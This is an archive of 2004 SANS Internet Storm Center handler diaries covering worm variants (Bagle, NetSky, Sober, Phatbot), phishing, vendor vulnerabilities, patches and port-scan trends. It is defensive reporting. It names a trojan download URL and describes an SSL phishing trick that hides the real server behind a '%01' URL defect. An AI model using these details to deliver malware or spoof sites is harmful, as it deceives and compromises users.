New Bagel variants, Q, R, S, and T are currently in the wild, with at least variant Q having been given a "Medium" threat level by Trend Micro. (At the time of this update, R, S, and T are being analyzed.) The Q variant uses a known vulnerability in Microsoft Outlook (Object Tag Vulnerability in Popup Window) as one means of propagation. The malware creates an email message which triggers the Outlook vulnerability to automatically download a malicious HTML file which drops a Visual Basic Script file in the Windows system folder. This VBS file then downloads the actual Bagel executable. The malware may also spread itself via the more standard "click me" attachment on an email.



The interesting twist here is that this variant sets the infected machine up as a server for subsequent downloads of the malicious code on TCP port 81.



Should be an interesting day...



More info:
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=PE_BAGLE.Q

http://vil.nai.com/vil/content/v_101108.htm

http://securityresponse.symantec.com/avcenter/venc/data/w32.beagle.r@mm.html

(note: I think that's Symantec's equivalent...)



Info on the Object Tag Vulnerability in Popup Window from MS:

http://www.microsoft.com/technet/security/bulletin/MS03-040.mspx





------------------------------------------------------

Handler on Duty: Tom Liston - ( http://www.labreatechnologies.com )

0 Comments

Published: 2004-03-16

No microsoft patches are available at www.NOT-A-Microsoft-security-site.com

Erik van Straten reported receiving a spoofed email that led to a spoofed Microsoft site that downloaded a trojan with instructions to run it to patch your system. The site name is www.microsoft-security-updates.com is NOT a Microsoft site.
This gets redirected to http://d558597.u25.surftown.com/mstasks.exe
mstasks.exe is identified by Symantec/Norton AntiVirus beta definitions as "Trojan.Etsur".

Repeat after me: Unless you subscribe to their email security notification service, Microsoft's policy is not to send notification of vulnerabilities. They never send patches in email to users.

A new polymorphic virus has been reported by Network Associates.
W32/Polybot.gen!irc a polymorphic variant of the w32/gaobot worm. It encrypts itself which may allow it to go undetected by antivirus software. Currently NA lists it as a low risk. It spreads through shares and can use vulnerabilities described in Microsoft Security Bulletins MS03-026, Ports 80, 135, 139, 445 or 593 are all possibly affected by that vulnerability. A new variant of this virus family has been discovered that uses the filename soundman.exe.

For Network Associates full writeup see:
http://vil.nai.com/vil/content/v_101100.htm

We received one report of a virus using a picture file format (bmp) to provide the password. Several antivirus systems include the ability to pull passwords out of email text and decrypt the bagle.pwdzip zip file finding the virus a passworded zip. Using bitmap's or other image file formats will make it more difficult for antivirus vendors to extract the password. This password in a picture method has been used by other systems to prevent automated abuse.

0 Comments

Published: 2004-03-15

Anti-spam list shutoff; Special report on "phishing" attacks

Anti-spam list shutoff

We received notice from some folks that have been affected by the
DNS-based anti-spam service shutoff from Monkeys.com. It appears they
have shutoff this service after giving warning to users.

From: http://www.monkeys.com/dnsbl/

"NOTICE: All Monkeys.Com DNS anti-spam lists were shut down and
discontinued on September 23rd, 2003. As of Sunday March 15th, 2004,
the final shutdown phase for these lists has begun and as of now every
IP address in the world has been listed on the former Monkeys.Com
anti-spam lists as a final inducement to get other Internet sites to
stop referring to our former anti-spam lists.

Please note that we have made all reasonable attempts to contact all of
the different mail server administrators at all of the different
Internet sites that have been using our anti-spam lists, and we have
tried to convince them all to stop improperly making references to our
former anti-spam lists, however our records indicate that despite these
efforts, as of Sunday, March 14th, 2004, there are still over 1,500
different Internet sites that are still improperly referring to the
various Monkeys.Com anti-spam lists. (All of these anti-spam lists were
officially shut down and discontinued way back in September of 2003,
and a public announcement of the shutdown was made at the time. Also,
and additionally, a final end-of-life public notice was posted to
various anti-spam mailing lists and newsgroups on February 10th,
2004.)"

------------------------------------------------------------------------

US Department of Justice issues special report on "phishing" attacks

The Department of Justice has issued a special report on the rise of
"phishing" attacks. It contains contact information for banks and
service providers who can help respond to a phishing attack. The report
also has helpful hints for identifying and responding to these attacks.

http://www.antiphishing.org/DOJ_Special_Report_On_Phishing_Mar04.pdf

0 Comments

Published: 2004-03-13

Oracle Application Server Web Cache Vulnerabilities; Port 65506

Oracle Application Server Web Cache Vulnerabilities

Oracle has reported that security vulnerabilities are found in Oracle Application Server Web Cache 10g (9.0.4.0.0) and Oracle9i Application Server Web Cache.

The nature of the vulnerabilities is not disclosed. However, Oracle has assigned a severity rating of 1, which is considered to be high risk.

According to the report, all Oracle supported platforms (Sun Solaris, HP/UX, HP Tru64, IBM AIX, Linux and Windows) are affected. The only exception is Oracle Application Server Web Cache 10g (9.0.4.0.0) on Windows, Tru64 and AIX.

For details, please refer to:
http://otn.oracle.com/deploy/security/pdf/2004alert66.pdf
Port 65506

We see an increase in scan on port 65506 over the last few days. This could be due to the scanning of Phatbot SSL Proxy. Let us know if you have further information on this.

http://isc.sans.org/port_details.html?port=65506
http://www.dslreports.com/forum/remark,9644670~mode=flat

0 Comments

Published: 2004-03-12

Compaq Web Management, BJs Alerts of Possible Credit Card Theft

Immunity Advisory: Compaq Web Management Vulnerability

Immunity, Inc. released an advisory regarding a vulnerability in Compaq Web Management (HP HTTP).
"Compaq Web Management includes a number of daemons, which listen on a number of TCP ports, and also to SNMP requests. On port 2381, an SSL HTTP server runs. If the system is configured to let anonymous users browse it, a common configuration, then a bug in the validation system allows users to upload their own certificates to be trusted by the client system. This would allow that machine to be administered remotely via such mechanisms as Secure Task Execution. This is considered a cricical problem, as Compaq Web Management is often installed on every machine in an enterprise."

Complete advisory is available at:

http://www.immunitysec.com/downloads/hp_http.sxw.pdf

Banking Group Comments on "Phishing" Losses

"Phishing" schemes have been increasing in frequency over the past year. These usually involve messages sent to users' e-mail boxes claiming to come from banks, e-bay, paypal, etc... and then direct users to a web site that appear to be legitimate. From that web site, users are asked to provide personal and/or financial details that may be used for identity theft or other forms of fraud.

The Austrailian Bankers' Association comments in a ZDNet article that the losses from these schemes "are not material enough" to warrant boosting online banking security, compared to "other forms of graft such as credit card fraud."

http://news.zdnet.co.uk/internet/security/0,39020375,39148259,00.htm

BJ's Wholesale Club Alerts Members of Potential Credit Card Leak

BJ's has issued a press release stating that a small fraction of its 8 million members may have been affected by a compromise that may have resulted in the theft of their credit card information. BJs has made additional customer care representatives available to assist members whose credit card may have been stolen. If you suspect unauthorized use of any credit card used at BJ's, you should report it to the credit card issuer or bank. Additional questions should be directed to 1-800-BJS-CLUB.

More Information is available at:

http://www.bjs.com/news/content/item234.shtml

http://www.msnbc.msn.com/id/4516301/

http://money.cnn.com/2004/03/12/news/companies/bj.reut/

------------------------------


Dave Brookshire, SANS Handler-on-Duty

0 Comments

Published: 2004-03-11

MS04-009 Upgraded to Critical, Disable Outlook HTML Parser, 'Phatbot', NetSky Day

(Handler's comment: we got off by one day on our diaries. The material below was originally posted on March 10th. I've updated it to reflect new information from March 11th. We'll be back on track tomorrow. -sachs)



MS04-009 Updated to 'Critical'. One of yesterday's Microsoft advisories ("Outlook 2002 mailto arbitrary code execution") was upgraded from 'Important' to 'Critical'. The initial advisory indicated that the vulnerability is mitigated by using a default homepage other then "Outlook Today". However, as pointed out in a proof of concept exploit, it is possible to cause code execution even if another view (e.g. Inbox) is used as default homepage. We strongly recommend application of the respective patches as quickly as possible.


(Update 3/11/04) iDefense reported that it is possible for an attacker to force Outlook to start in the "Outlook Today" view. Details are at
http://www.idefense.com/application/poi/display?id=79&type=vulnerabilities

Reading HTML e-mail as plain text in Outlook. By default, Outlook will parse "nonsecure" HTML e-mail. This feature has been abused by numerous phishing e-mails and similar cognitive hacking schemes. Microsoft published a step by step guide on how to turn off the HTML parser. This modification has no effect on digitally signed or encrypted HTML e-mail. See http://support.microsoft.com/default.aspx?scid=kb;en-us;Q307594 for details. This feature is only available with Outlook 2002 if SP1 for Microsoft Office XP is installed.

Phatbot. For the last couple of days yet another bot is hunting for MyDoom infected systems. This bot/worm will also scan for vulnerable dame-ware installs, systems vulnerable to the RPC DCOM exploit, and open file shares. At this point, this bot does not appear to make a significant impact globally. This bot is however significant as it is using P2P techniques to communicate. Infected systems can be spotted by outbound port 1025 scans. At this point, we track about 5,000 infected systems.

http://isc.sans.org/port_details.html?port=1025

http://www.dslreports.com/forum/remark,9614814~mode=flat
(Update 3/11/04) Netsky Day. An advisory yesterday from Pandasoft suggested that March 11th might show an increase in Netsky virus activity. The ISC did not detect any such increase. There was a new variant of Netsky released late on the 10th, and it seems to function much like the previous versions. http://www.pandasoftware.com/about/press/viewNews.aspx?noticia=4852


------

Johannes Ullrich, jullrich_AT_sans.org (handler 3/10/04)

Marcus H. Sachs, msachs_AT_sans.org (handler 3/11/04)

0 Comments

Published: 2004-03-10

MS Monthly Updates Released

MS Monthly Updates Released

---------------------------------------------

Microsoft has released three updates on its regular "second Tuesday of the month" schedule:


UPDATE:
MS04-009 was raised from 'Important' to 'Critical'.



Microsoft Security Bulletin MS04-008 describes a possible DoS condition within Windows Media Services. The issue affects only Microsoft Windows 2000 Server Service Pack 2, Microsoft Windows 2000 Server Service Pack 3, and Microsoft Windows 2000 Server Service Pack 4. The only vulnerable version of Windows Media Services is version 4.1 for Windows Server 2000. If you are unable to patch an affected system, a possible work-around would be to block port 7007 and 7778 at the firewall. Note: Blocking port 7007 will keep multicast streams and playlists from being streamed to the Internet. Blocking port 7778 will disable remote administration of Windows Media Services. This issue is listed by Microsoft as having a severity of "Moderate."





http://www.microsoft.com/technet/security/bulletin/MS04-008.mspx



Microsoft Security Bulletin MS04-009 describes a vulnerability in Microsoft's HTML rendering code (on machines with Outlook 2002 installed) that could allow a malicious HTML to execute script code within the "Local Machine" zone on an unprotected system. It appears that anything that uses Microsoft's HTML rendering code on such a machine could be vulnerable. The issue is caused by the way Outlook 2002 handles certain "mailto" URLs. (Note: Outlook 2002 is both a stand-alone product and a part of Office XP.) For situations where patches cannot be applied, Microsoft suggests that the issue can be mitigated by changing Outlook's default start page to something besides "Outlook Today." We have additional information which suggests, however, that this mitigation is ineffective and can be easily circumvented. We would suggest that you switch to viewing email as "text only" if you are unable to patch. (Note: This will only mitigate attack via a malicious email. It does nothing to protect you from other HTML vectors that may exploit this vulnerability.) Microsoft has listed this issue as having a severity of "Critical."





http://www.microsoft.com/technet/security/bulletin/MS04-009.mspx



additional information:



http://secunia.com/advisories/11076/

http://www.idefense.com/application/poi/display?id=79&type=vulnerabilities
http://www.kb.cert.org/vuls/id/305206




The third update, Microsoft Security Bulletin MS04-010, covers a possible information disclosure in Microsoft MSN Messenger. This issue affects Microsoft MSN Messenger versions 6.0 and 6.1, and does not affect any versions of Microsoft Messenger. Because of a flaw in the way that MSN Messenger handles file requests, a remote attacker could view the contents of files at known locations on a user's system. Microsoft has listed the severity of this issue as "Moderate."





http://www.microsoft.com/technet/security/bulletin/MS04-010.mspx





---------------------------------------------

Handler on duty: Tom Liston - ( http://www.labreatechnologies.com )

0 Comments

Published: 2004-03-09

Users still double clicking email attachments, MSJVM Removal Tool 1.0, Upcoming ISC Webcast

FYI - Some AV Vendors will not have virus detection signatures for new variants of mass mailing viruses available for download until Tuesday, MARCH 9th, when Microsoft will be offering megabytes of security patches for unfixed vulnerabilities. The second Tuesday of the month is Microsoft's scheduled Security Bulletin release day.

Microsoft Security Bulletin Search
http://www.microsoft.com/technet/security/current.aspx

Sober.D

The W32.Sober.D@mm has received a higher alert rating by some AV vendors as users continue to open attachments from unknown senders. Sober.D should undoubtably benefit from some synergy with todays anticipated Microsoft Security Bulletin announcement. The synergy will come from Microsoft, which may be mass mailing users to announce new Security Bulletins. If your network allows attachments it may save you some clean-up time if there's a gentle reminder sent out that Microsoft's policy is to never send email's with attachments. Sober.D presents itself as a "virus alert" from Microsoft with the infected attachment. (Win32.Sober.D [Computer Associates], W32/Sober.d@MM [McAfee], WORM_SOBER.D [Trend])

Last but not least on virus variants, you can check with your favorite AV vendor for signatures to detect the latest crop of variants;
W32.Netsky.K@mm
W32.Keco@mm
W32.Netsky.J@mm

MS announces it's MSJVM Removal Tool 1.0

"The Microsoft JVM Removal Tool can be used to remove the MS Java Virtual Machine (MSJVM). Use of this tool is the only supported method for removing the MSJVM from a Microsoft operating system."

http://www.microsoft.com/downloads/details.aspx?FamilyID=f2002119-b4d5-4013-83bc-4a8ad95e959f&DisplayLang=en

ISC Webcast The monthly Internet Storm Center webcast is on Wednesday, March 10th at 1pm EST. Join us for a solid hour of discussion about new threats we've seen this past month, including deconfliction of all of the new viruses, port activity, new software vulnerabilities, and other items of Internet security interest. Details for tuning in are online at;
http://www.sans.org/webcasts/show.php?webcastid=90486.

Patrick Nolan

0 Comments

Published: 2004-03-08

SoberD@MM from spoofed Microsoft email addresses, new version of Netsky

SoberD@MM

Av vendors are releasing signatures for SoberD, a new mass mailer with an attached executable or zip file. The emails subject line is "Microsoft Alert: Please Read!" or "Microsoft Alarm: Bitte Lesen!"

Check with your AV vendor for signature updates.

http://vil.nai.com/vil/content/v_101081.htm
http://securityresponse.symantec.com/avcenter/venc/data/w32.sober.d@mm.html
http://www.f-secure.com/v-descs/sober_d.shtml

The body of the english version of the SoberD email starts with:
"New MyDoom Virus Variant Detected!

A new variant of the W32.Mydoom (W32.Novarg) worm spread rapidly .........:"

New version of Netsky

Netsky has a new version that is called W32.Netsky.I@mm by Symantec. The new version was discovered today and Symantec has released an updated definition for it. This version does the same as the rest, however subject lines make it more enticing for a user to open. The From line is service@yahoo.com and consists of one of three different subjects or body lines that lead the user to believe their account with Yahoo has been closed. There is an attachment that appears like a valid link to Yahoo for the user to click on to reactivate their account.

For more information see:

http://securityresponse.symantec.com/avcenter/venc/data/w32.netsky.i@mm.html

Handler on Duty: Lorna Hutcheson

0 Comments

Published: 2004-03-07

New version of Netsky

New version of Netsky

Netsky has a new version that is called W32.Netsky.I@mm by Symantec. The new version was discovered today and Symantec has released an updated definition for it. This version does the same as the rest, however subject lines make it more enticing for a user to open. The From line is service@yahoo.com and consists of one of three different subjects or body lines that lead the user to believe their account with Yahoo has been closed. There is an attachment that appears like a valid link to Yahoo for the user to click on to reactivate their account.

For more information see:

http://securityresponse.symantec.com/avcenter/venc/data/w32.netsky.i@mm.html
Handler on Duty: Lorna Hutcheson

0 Comments

Published: 2004-03-06

Beagle Backdoor Port, Wakeup Call from NetSky.G and NetSky.H

Beagle Backdoor Port

All variants of the Beagle virus so far have opened a listener on TCP/2745. One source has indicated that there is underground activity in making this port accessible for arbitrary remote code execution on Beagle infected machines. We've seen an increase in scanning for this port over the past few days as well. Organizations can use this "feature" of the Beagle virus to scan their own networks to track down infected machines by scanning for TCP/2745.

Wakeup Call from NetSky.G and NetSky.H

Symantec Security Response reported that systems infected with NetSky G and H variants will get a wakeup call from their PC speakers on March 8th between 11:00am and 12:00pm local time (H variant) or March 10th between 6:00am and 9:00am local time (G variant):
"If an infected computer's time is between 6:00 A.M. and 9:00 A.M. on Tuesday, March 10, 2004, the PC speaker will beep in a continuous loop. Each beep will be for a random period of time, at a random frequency."

http://www.sarc.com/avcenter/venc/data/w32.netsky.g@mm.html

"If an infected computer's system clock is between 11:00 A.M. and 12:00 P.M. on March 8, 2004, the PC speaker will beep in a continuous loop. Each beep will be for a random period of time, at a random frequency."

http://www.sarc.com/avcenter/venc/data/w32.netsky.h@mm.html

Note that March 10th, 2004 is a Wednesday, not a Tuesday as indicated on the Symantec website. Thanks to the astute reader who poined this out.

--Joshua Wright/Handler on Duty

0 Comments

Published: 2004-03-05

Latest Viruses, SSL Exploit, Juniper Update, New ISC Features

Latest Virus Versions. New versions of MyDoom and NetSky were reported today. Here's the current scoreboard for the top three viruses:

NetSky (first observed on February 16th): Variant H

Bagel (first observed on January 18th): Variant K

MyDoom (first observed on January 26th): Variant H


Another SSL Exploit. A reader provided the Storm Center with the following information:


The basic attack: Get a certificate from a known and trusted CA server. *Any* certificate will work. Because the certificate is trusted, the user is never
prompted. In this example, we are pretending that "PayPal" is our hostile server. Use the URL "%01" defect to hide the actual server name. The phishing target in this example is "Microsoft".

When a user visits the site, they see "https://www.microsoft.com/" and an SSL lock. But the certificate and web contents actually come from the hostile server, and the user was never prompted about a problem.

The only way to tell if the certificate is valid is to actually double-click on the little lock and check the certificate manually. And you would need to do that for EVERY web page you visit and EVERY image you load. (HTML and images may come from other servers.)

If we used frames, then the key only corresponds with the main frame's certificate, not the web pages in each frame.

Proof of concept:

http://lab.securescience.net/exploits/ssl-phish.htm

(View using Internet Explorer)



Juniper Updates Juniper Networks has updated software available for registered users. Stay tuned for additional details as they are made public.



New at the Storm Center. We've added a new search box above the main chart where users can enter any UDP or TCP port and retrieve current data on that port. Also, we've added the ability to upload a file when using the online form at

http://isc.sans.org/contact.html

If you upload malware, please ZIP, RAR, or TAR it and if possible encrypt it with the password "infected". Also be sure to mention in your note that you've attached something evil. As you know, it's not nice to fool Mother Nature. :)



Marcus H. Sachs

The SANS Institute

0 Comments

Published: 2004-03-04

SSL Phishing Scam / FreeBSD DoS Vulnerability / Acrobat Reader Flaw

SSL Phishing Scam



Phishing scams are becoming very common. While some of them are easy to recognize, some are becoming very difficult to detect due improvements and techniques to explore browsers vulnerabilities, i.e, url obfuscation.


A recent advisory sent by the US Federal Trade Commission about a way to recognize "safe" websites when conducting sensitive transactions contained an incorrect statement.
The statement implied if a Lock icon was visible then SSL was in use and that was a safe site.
In this way is possible to recognize a site that is using SSL, but since this could also be a fraudulent certificate, it is not the possible to identify fake or real websites by the lock icon alone.

So, while you can assure that the session is encrypted, it is not possible to ensure that this is the real organization.


The use of fraudulent certificates are also being widely used in phishing scams, so it is a good idea to always verify the certificates.


*Update*

Dr. Neal Krawetz, from Secure Science Corporation, just sent an email about the SSL/ lock icon issue:

"One of the SSL encoding methods is "plain text".
Most SSL servers have this disabled by default, but most browsers support it.
When plain text is used, no central certificate authority is consulted and the user never sees a message asking if a certificate should be accepted (because "plain text" doesn't use certificates).

Keeping that in mind, the little lock icon may not even indicate an encrypted channel. The little lock only indicates an SSL connection."

References: http://www.ftc.gov/bcp/conline/pubs/online/cybrsmrt.htm

http://www.zdnet.com.au/news/security/0,2000061744,39116416,00.htm

FreeBSD vulnerability

iDefense released today a security advisory about a Denial of Service vulnerability on FreeBSD systems.


According the advisory, a remote exploitation of a denial of service attack is possible by sending multiple out-of-sequence packets to a FreeBSD system. Also, to be successful the attack will only need one open TCP port open.
The attack works against all FreeBSD versions.


Even there is no PoC released yet, this attack looks pretty simple and FreeBSD users are advised to apply the patches as soon as possible.


Patches are already released and available at FreeBSD.org website:

[FreeBSD 5.2]

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-04:04/tcp52.patch

[FreeBSD 4.8, 4.9]

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-04:04/tcp47.patch

References:
http://www.idefense.com/application/poi/display?id=78&type=vulnerabilities&flashstatus=true
Acrobat reader vulnerability



According a security advisory released by NGSSoftware there is a buffer overflow vulnerability in Adobe Acrobat Reader in the way it handles the XML Forms Data Format, or XFDF.


Also according the advisory, "Adobe urgently advises users of Adobe Reader to
upgrade."



References: http://www.ngssoftware.com/advisories/adobexfdf.txt

http://www.adobe.com/support/downloads/main.html

------------------------------------------------------------

Handler on Duty: Pedro Bueno (bueno@ieee.org)

0 Comments

Published: 2004-03-03

Virus Alphabet, War!, Port 3389 Spike, WinZip Issues

Virus Alphabet



As of the time I write this, the most current versions of the recent virus crop are:



NetSky : Variant F

Bagel: Variant K

MyDoom: Variant G



The most insidious of these is the latest Bagel version, 'K', which sends a message "from" the administrator of the user's email system claiming that their email service is in jeopardy for any of a number of reasons. Although the message content varies, it essentially tells the user that they must run an attached program in order to "fix" whatever issue has caused problems with their email service. Perhaps the most creative aspect of this version, however, is that it uses encrypted zipfiles in order to bypass virus filtering. The password for the file is contained within the context of the message instructing the user how to open the attachment.



-------------------------------------------------------

WAR!



Strings found within the latest versions of NetSky and Bagel seem to indicate that the authors of the current "Top Two" pieces of malware aren't particularly happy with each other. A string found within Bagel.K proclaims "Hey, NetSky, f**k off you b***h!", while a similar message from the author of NetSky says "Skynet AntiVirus - Bagle - you are a looser!!!!"



Perhaps then, here is something they'll understand:



char msg[] = {0x47, 0x72, 0x6F, 0x77, 0x20, 0x75, 0x70, 0x21, 0};



-------------------------------------------------------

Port 3389 Spike



We've noticed a recent spike in port 3389 (terminal services) activity.



http://www.dshield.org/port_report.php?port=3389



Because the number of sources remains low and consistent while the numbers for targets and records spike, we are currently assuming that this is simply a reporting anomaly (caused when a scan hits a large, well-monitored netblock and is therefore "over-reported" when compared with other days). If, however, you see any indication to the contrary, please let us know.



-------------------------------------------------------

WinZip Issues



Because of issues involved with the decoding of MIME parameters within certain archive types (files with .mim, .uue, .uu, .b64, .bhx, .hqx and .xxe extensions), WinZip versions prior to the current, released Version 9.0 are vulnerable to a buffer overflow which can lead to the execution of arbitrary code simply by opening a specifically crafted archive. If you use WinZip, the ISC recommends that you either upgrade to version 9.0 or disable WinZip's association with .mim, .uue, .uu, .b64, .bhx, .hqx and .xxe file extensions.




-------------------------------------------------------

Handler on duty: Tom Liston - ( http://www.labreatechnologies.com )

0 Comments

Published: 2004-03-02

WFTPD Patch available, Dell Open Manager vulnerability




Texas Imperial Software has made the patch available for the WFTPD vulnerability.


For unregistered users , the link is


http://www.wftpd.com/downloads.htm .



For registered users, you should use the same web site, along with the

user name and password that was emailed to you last September for the

or emailed to you with the software when you purchased it.




Dell Open Manager Vulnerability


A critical security hole in Dell OpenManage server could leave the

product open to attack by an unauthorized user.

The vulnerability is due to a boundary error in the Web server when

handling certain HTTP POST requests. POST is an extremely common HTML

method of processing forms but can be exploited by sending a message with
a hidden but extremely long variable to cause a heap overflow.




http://www.techworld.com/news/index.cfm?fuseaction=displaynews&NewsID=1115








Deb Hale

haled@pionet.net

0 Comments

Published: 2004-03-01

TCP 554 scanning; Linux mremap local root exploit posted

We have observed reasonably widespread scanning for TCP port 554. This
activity may be related to the recent RealNetworks advisory on a
vulnerability in their server product that would enable a remote
attack. The number of attacking source IP addresses is low, which
probably means that this activity is not worm-based.

The activity has occurred as early as February 10, 2004. Activity
prior to this appears to be scanning for previous RealNetworks
vulnerabilities. If you have full packet captures of an established
TCP session on port 554, please submit your logs for further analysis.

http://isc.sans.org/port_details.html?port=554
http://service.real.com/help/faq/security/security022604.html
The following logs show some incoming TCP SYN requests to TCP port 554.
In this case, the SYN attempts were silently dropped by iptables and
so no further traffic was observed. Note that the destination IP
address and timestamps have been modified.

08:21:47.611209 63.201.91.4.1558 > 1.1.1.1.554: S [tcp sum ok]
1231748817:1231748817(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
(ttl 110, id 45589, len 48)

21:55:39.377217 68.145.244.127.4500 > 1.1.1.1.554: S [tcp sum ok]
2723306309:2723306309(0) win 16384 <mss 1460,nop,nop,sackOK> (DF)
(ttl 108, id 29929, len 48)

21:55:42.342745 68.145.244.127.4500 > 1.1.1.1.554: S [tcp sum ok]
2723306309:2723306309(0) win 16384 <mss 1460,nop,nop,sackOK> (DF)
(ttl 108, id 30326, len 48)

16:36:58.621260 203.87.51.2.2718 > 1.1.1.1.554: S [tcp sum ok]
1528706769:1528706769(0) win 8192 <mss 1460> (DF)
(ttl 112, id 50200, len 44)
-----------------------------------------------------------
A local root exploit was released today for Linux kernels vulnerable to
the mremap bug previously disclosed on February 18, 2004. This exploit
was released by the vulnerability researchers at ISEC, the same folks
that found the initial vulnerability.

This exploit has been confirmed to work on linux kernels below 2.4.25.
Kernel versions 2.4.22 and 2.4.24 were tested and both were exploited
successfully to gain a local root shell.

http://www.isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt

0 Comments